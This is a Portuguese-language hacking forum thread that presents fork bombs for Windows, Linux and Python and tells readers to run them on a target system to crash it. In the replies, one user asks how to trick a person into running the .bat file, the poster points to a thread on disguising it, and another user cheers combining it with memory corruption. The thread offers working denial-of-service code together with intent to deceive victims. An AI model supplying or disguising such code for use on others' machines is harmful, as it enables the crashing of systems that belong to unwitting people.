Fork Bomb's

Fork bomb é um ataque de negação de serviço que cria um grande número de processos a um ritmo extremamente rápido, e assim causa uma lentidão extrema e até mesmo o reboot do sistema.
E como o meu primeiro tópico, eu vou apresenta um fork bomb para Windows, Linux e um em Python.

Fork Bomb Windows -

Salve o codigo abaixo em um arquivo com extensão .bat e execute-o no sistema Windows que deseja detonar.

Code: Select all

%0|%0|%0

Fork Bomb Linux -

Basta executa o código abaixo no terminal do sistema.

:(){ :|:& };:

Fork Bomb Python -

Salve o código abaixo em um arquivo com extensão .py e execute-o no sistema alvo.

import os 
while 1: 
os.fork()

Vlw's...Flw's
1 x

--- I WANNA GET HIGH ---
Image
--- I WANNA GET HACK ---

Re: Fork Bomb's

Ak-47 wrote:
Mon Dec 04, 2017 6:21 pm
Curti d mais , mas acho um pouco complicado fazer a pessoa executar um arquivo .bat assim do nada.
Vc tem alguma sugestão para sanar essa questão ?

Certamente Ak-47, um tópico que vai te ajudar a resolver esse dilema de camuflar o forkbomb é esse viewtopic.php?f=45&t=278
1 x

--- I WANNA GET HIGH ---
Image
--- I WANNA GET HACK ---

Re: Fork Bomb's

K1ll4ll wrote:
Wed Dec 06, 2017 1:32 am
Ak-47 wrote:
Mon Dec 04, 2017 6:21 pm
Curti d mais , mas acho um pouco complicado fazer a pessoa executar um arquivo .bat assim do nada.
Vc tem alguma sugestão para sanar essa questão ?

Certamente Ak-47, um tópico que vai te ajudar a resolver esse dilema de camuflar o forkbomb é esse viewtopic.php?f=45&t=278

Corrupção de memoria + forkbomb .............................................................................. Gostei !
0 x

Quem corre atrás tá ligado qual é o preço, não cresce o olho no que é dos outros !

#!/bin/bash

Image